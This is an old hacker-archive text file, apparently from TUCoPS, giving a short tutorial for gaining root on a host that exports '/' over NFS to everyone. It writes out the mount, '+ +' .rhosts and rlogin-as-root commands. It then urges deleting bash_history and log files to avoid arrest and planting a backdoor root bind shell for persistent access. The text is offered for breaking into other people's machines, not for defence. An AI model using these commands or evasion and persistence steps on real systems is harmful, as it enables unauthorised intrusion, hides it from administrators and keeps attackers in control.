Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Unix :: General :: nfs1.txt

NFS Export Root Exploit

NFS Export Root

So you found a web site with the NFS export set as / (everybody) did ya?
Well on this site I will teach you how to gain root from that NFS
export. It's quite simple really.


1. You need root on a box (preferably) your own.
2. Somewhat of a brain, not really though this is easy

Type the Following:

# mount /mnt
# cd /mnt
# echo "+ +" > .rhosts
# rlogin -l root

Voila you now have root on the host. Silly admins!


When you are root you should take the proper precautions so you aren't
logged and arrested. I won't tell you how to do things like delete the
bash_history file *hint* and the files in /log that contain your info
but you should really know what your doing when you are rooting someones
box. Also when you are root you should make sure you can obtain root on
the box even if the admin fixed the initial error/hole. Simple way to do
this bind a root shell to a certain port you specify using a backdoor.
If you have any questions e-mail me at


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH